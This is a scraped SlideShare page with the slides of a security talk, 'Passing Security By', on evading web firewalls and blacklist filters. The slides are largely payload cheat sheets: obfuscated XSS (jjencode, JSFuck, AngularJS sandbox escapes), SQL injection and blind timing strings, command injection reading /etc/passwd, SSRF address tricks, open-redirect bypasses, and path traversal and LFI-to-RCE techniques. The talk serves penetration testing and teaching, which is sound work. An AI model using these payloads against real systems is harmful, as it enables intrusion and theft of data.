Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.
Próxima SlideShare
What to Upload to SlideShare
Siguiente
Descargar para leer sin conexión y ver en pantalla completa.

1

Compartir

Descargar para leer sin conexión

Serhii Korolenko - Passing Security By

Descargar para leer sin conexión

http://sched.co/EF9c

Libros relacionados

Gratis con una prueba de 30 días de Scribd

Ver todo

Serhii Korolenko - Passing Security By

  1. 1. Passing Security By <script>$=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$, $___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+ $.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+"(""+$.__$+$.__$ +$._$$+$._$+""+$.__$+$.$$_+$._$_+$._$+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$_$+$._$$+$._$+""+$.$__+$.___+""+$.__$+$._$_+$._$$+$.$$$_+""+ $.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.___+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.__$+"""+$.$__+$.___+")"+""")())();</script>
  2. 2. The Black List
  3. 3. The Black List The White Box
  4. 4. Show Me Your /*Payl%0Ads*/ Payload Quality How your payloads Analytical skills Ciklum Hiring Lab Logs
  5. 5. Computer != Human <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_: ++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$, $_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($. $_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"") [$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+ $.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$; $.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$ $_+""+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+""")())();</script> <script>alert(0)</script>
  6. 6. White List Black List Web Application Firewall Validation Складно імплементувати Складно підтримувати Легко імплементувати Впливає на навантаження Весело обходити Вразливість залишається на сервері BlackHat територія Не відноститься до безпеки напряму Ускладнює пошук вразливостей Baaax61x61x61dNot bad remediation Does not apply to security Vulnerability still exist
  7. 7. 01. 02. 03. 04. Defense Reaction 03. Erase End session for malicious user. 04. Logout HTML encode input/output string. 01. Encode Delete bad symbols, words. 02. Delete Delete whole string, parameter is empty.
  8. 8. Security Bypass Techniques Encoding Technology Border Logic Little-Known Replacing Obfuscating RCE SQL INJECTION XSS SSRF DIRECTORY TRAVERSAL + LFI OPEN REDIRECT
  9. 9. Xss <script>alert()</script> <script>prompt()</script> <script>confirm()</script> <script>console.log()</script>
  10. 10. Xss outside: <script>alert()</script> <tag "><script>alert()</script> ;alert() <a href="javascript:alert(1)">
  11. 11. Xss <scr<script>ipt> <ScRipT> <svg onload=“”> <script > <script x>
  12. 12. Xss Space NULL <scri%00pt>alert ()</scri%00pt> TAB <svg+src=“jav%09ascript:alert(1)"> Newline <script>//>%0Aalert(1);</script> Carriage Return <script>//>%0Dalert(1);</script> Spaces < s c r i p t > p r o m p t ( 1 ) < / s c r i p t
  13. 13. Xss Less Than < < ‹ < (Homoglyph) Encoding %3c Double encoding %253c 0xC0 0xBC (%C0%BC) - UTF <img <

  14. 14. Xss Less Than< %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 < < < < < < &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c < < < < < &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C < < < < < &#X000003C; x3c x3C u003c u003C < < < < < &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C < < < < < &#x000003C;
  15. 15. Xss Inside <Script> <script>u0061u006Cu0065u0072u0074(1)</script> <script>a=“get";b="URL";c="javascript:";d="alert(1);";eval(a+b+c+d);</script> <img src="1" onerror="alert(1)" /> Obfuscate jjencode: <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$: ({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({} +"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$. $_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($. $=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+ (!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$. $_$_+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+""")()) ();</script>
  16. 16. Jsfuck []()!+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+ []+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[] +!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+ (!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+ [])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[] +!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+ []+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+ [])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+ [])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+ (!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[]) [+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]] +(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+ (!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+ [])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
  17. 17. Nonamecon Ctf Xss {{a = {'y':''.constructor.prototype}; a[‘y'].charAt=[].join;$eval('a=alert(1)');}} document.cookie = document[‘cookie’] {{a = {‘y’:’’[‘constructor’][‘prototype’]};a['y'] ["charAt"]=[]["join"];$eval('a=alert(1)')}}
  18. 18. Nonamecon Ctf Xss {{a = {‘y':''.constructor.prototype} = {{a['y']=''['constructor']['prototype'] {{a[‘y’]=‘’[‘constructor']['prototype'];a['y'] ['charAt']=[]['join'];$eval('a=alert(1)')}} {{a['y']=''['constructor']['prototype']}}{{a['y'] ['charAt']=[]['join']}}{{$eval('a=alert(1)')}}
  19. 19. Nonamecon Ctf Xss
  20. 20. Best Xss ><svg/onload=alert(1)>
  21. 21. Sql Injection ‘ %27 %2527 “ %22 %2522 # %23 %2523 -- %2d%2d %252d%252d ; %3B %253B ) %29 %2529 * %2a %252a ;%00 NULLBYTE /* C-style comment -- - SQL Comment
  22. 22. Sql Injection Logic Testing‘ or 1=1 — true ‘ or 1=2 — false ‘ and 1=1 — true ‘ and 1=2 — false ‘ OR 1<2 — TRUE ‘ OR ‘aaa’<>’bbb’ — TRUE HACK
  23. 23. Blind Sql Injection ‘+waitfor+delay+’00:00:05'-- ‘+AND+BENCHMARK(1000000000,MD5(1)) ‘+AND+SLEEP(5)
  24. 24. Sql Injection Space%09 – Horizontal Tab %0A – New Line %0D – Carriage Return %0B – Vertical Tab %0C – New Page %A0 - Non-breaking Space /**/ - comment /*!*/ - comment '%0A%09UNION%0CSELECT%A0NULL%20%23
  25. 25. Sql Injection Space Mssql%01 Start of Heading %02 Start of Text %03 End of Text %04 End of Transmission %05 Enquiry %06 Acknowledge %07 Bell %08 Backspace %09 Horizontal Tab %0A New Line %0B Vertical Tab %0C New Page %0D Carriage Return %0E Shift Out %0F Shift In %10 Data Link Escape %11 Device Control 1 %12 Device Control 2 %13 Device Control 3 %14 Device Control 4 %15 Negative Acknowledge %16 Synchronous Idle %17 End of Transmission Block %18 Cancel %19 End of Medium %1A Substitute %1B Escape %1C File Separator %1D Group Separator %1E Record Separator %1F Unit Separator %20 Space %25 % S%E%L%E%C%T%01column%02FROM%03table;
  26. 26. Sql Injection UNION(SELECT(column)FROM(table)) 1’UNION(SELECT(1),2,3,4,5,(6)FROM(Users)WHERE(login=‘admin’))# Allowed Intermediary Characters after AND/OR: %20 Space %2B + %2D - %7E ~ %21 ! %40 @ OR-+-+-+-+~~1=1
  27. 27. Sql InjectionSeLeCt %00SELECT SELSELECTECT %53%45%4c%45%43%54 %2553%2545%254c%2545%2543%2554 UNION ALL SELECT /*!union*/+/*!all*/+/*!select*/ AND -> && -> ‘&&1=2 OR -> || -> ‘||1=1 = -> LIKE,REGEXP, not < and not > > X -> not between 0 and X WHERE -> HAVING
  28. 28. Sql Injection Avoiding the use of quotations: WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110) HEX SELECT password FROM User WHERE login=0x61646D696E No Comma: SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1) JOIN (SELECT 2) JOIN (SELECT 3) JOIN (SELECT 4) LIMIT 0,1 -> LIMIT 1 OFFSET 0 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
  29. 29. Remote Commands ExecutionAdditional command ; ls && ls | ls || ls Inside command $(cat /etc/passwd) `cat /etc/passwd` () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6” - shellshock Blind sleep(5) ping -i 30 127.0.0.1
  30. 30. Remote Commands Execution Commands execution without space - Linux cat</etc/passwd {cat,/etc/passwd} cat$IFS/etc/passwd - internal field separator cat{$IFS}/etc/passwd IFS=,;`cat<<<uname,-a` who$@ami w’h'o'am'i w"h"o"am"i
  31. 31. Server-Side Request Forgery http://127.0.0.1 http://localhost http://0177.0.0.1 http://2130706433 = http://127.0.0.1 http://3232235521 = http://192.168.0.1 http://0xA9.0xFE.0xA9.0xFE/ http://[::]:80/ http://0000::1:80/ http://localtest.me
  32. 32. Server-Side Request Forgery
  33. 33. Server-Side Request Forgery http://1.1.1.1&@2.2.2.2#@3.3.3.3/ http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾
  34. 34. Open Url Redirection //www.yoursite.com https:www.yoursite.com /www.yoursite.com/ //www.yoursite.com/ //www%E3%80%82yoursite%E3%80%82com //www.yoursite%00.com www.whitelisted.com.www.yoursite.com redirect to evil.com http://www.theirsite.com@www.yoursite.com/ http://www.yoursite.com/http://www.theirsite.com/ http://www.yoursite.com/folder/www.folder.com http://www.example.com/redirect.php?url=data:text/ html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
  35. 35. Directory Traversal + File Inclusion /etc/passwd ../../../../../../../../../../../../../../../etc/passwd ../.././././.././.././../../etc/passwd ../../../etc/passwd%00 ….//….//etc/passwd ..///////..////..//////etc/passwd .. ../ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 6 bit Unicode encoding . = %u002e / = %u2215 = %u2216 Double URL encoding . = %252e / = %252f = %255c UTF-8 Unicode encoding . = %c0%2e, %e0%40%ae, %c0ae / = %c0%af, %e0%80%af, %c0%2f = %c0%5c, %c0%80%5c
  36. 36. From File Inclusion To Rce file upload forms/functions PHP wrapper expect://command PHP wrapper php://file PHP wrapper php://filter PHP input:// stream data://text/plain;base64,command log files with controllable input like: /var/log/apache/access.log /var/log/apache/error.log /var/log/vsftpd.log /var/log/sshd.log /var/log/mail
  • DmytroVelychko5

    Apr. 24, 2020

http://sched.co/EF9c

Vistas

Total de vistas

279

En Slideshare

0

De embebidos

0

Número de embebidos

4

Acciones

Descargas

11

Compartidos

0

Comentarios

0

Me gusta

1

×